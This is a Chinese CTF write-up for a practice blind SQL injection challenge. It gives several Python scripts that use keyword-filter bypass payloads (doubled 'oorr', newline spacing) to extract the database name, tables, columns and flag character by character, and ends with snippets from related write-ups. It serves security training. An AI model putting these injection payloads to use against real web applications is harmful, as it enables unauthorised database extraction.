CTF實驗吧認真一點 SQL盲注

2021-09-25 21:27:31 字數 2855 閱讀 4110

實驗吧位址

很明顯的返回兩個不同得頁面,判斷為sql盲注

並且 過濾了敏感字元

測試的時候還發現過濾了substr

嘗試繞過,返回錯誤頁面 說明 過濾是可以被繞過的

爆庫名長度

import requests


str1 = 'you are in'


url = ''


for i in range(1,30):


key = 


r = requests.post(url, data=key).text


print(i)


if str1 in r:


print('the length of database is %s'%i)


break
暴庫、、

import requests


guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'


str1 = 'you are in'


url = ''


database = ''


for i in range(1,19):


for j in guess:


key = 


r = requests.post(url, data=key).text


print(key)


if str1 in r:


database += j


print(j)


break


print(database)
報表

import requests


guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'


str1 = 'you are in'


url = ''


tables = ''


for i in range(1,12):


for j in guess:        


flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i, j)    


flag = flag.replace(' ', chr(0x0a))


key =        


r = requests.post(url, data=key).text


print(key)


if str1 in r:


tables += j


print(j)


break


print(tables)



import requests


guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/?!:@#$%&(),.'


str1 = 'you are in'


url = ''


columns = ''


for i in range(1,6):


for j in guess:        


flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)    


flag = flag.replace(' ', chr(0x0a))


key =        


r = requests.post(url, data=key).text


print(key)


if str1 in r:


columns += j


print(j)


break


print(columns)
flag指令碼

import requests


guess = '~abcdefghijklmnopqrstuvwxyz_0123456789{}!@#$%^&*()-=+*'


data = ''


str1 = 'you are in'


url = ''


for i in range(1,20):


for j in guess:        


flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)    


flag = flag.replace(' ', chr(0x0a))


key =        


r = requests.post(url, data=key).text


print(key)


if str1 in r:


data += j


print(j)


break


print(data)
q

flag

##很尷尬(把去掉才是便準答案正常應該是個空格沒想到 空格這個字元)

認真一點!實驗吧

題目是乙個比較簡單的bool盲注題目,沒有錯誤回顯,只有you are in you are not in 和waf的注入提醒。我用burp模糊測試了一下 發現過濾了空格,union,and,逗號等,但是沒有過濾or,所以我們來用or試試看把。發現仍是you are not in.這是為什麼?明明沒...

sql注入之布林注入 實驗吧 認真一點啊!

原文 先簡單地試試,發現輸入1會回顯you are in,輸入其他會回顯you are not in,而輸入1 也會回顯you are not in,這說明單引號沒有被吃掉,還可以使用。繼續測試發現過濾了and 空格和 or沒有被過濾。構造id 1 or 0a 1或者id 1 or 1,看到的回顯卻...

實驗吧 CTF 簡單的sql注入思路

我們先用單引號測試 頁面錯誤 再加個單引號 頁面正常 那初步判斷語句應該是 select from xx where id 然後我們測試下我們滲透經常用的關鍵字有沒有被過濾 or and select union 1,2,3 information schema.tables information...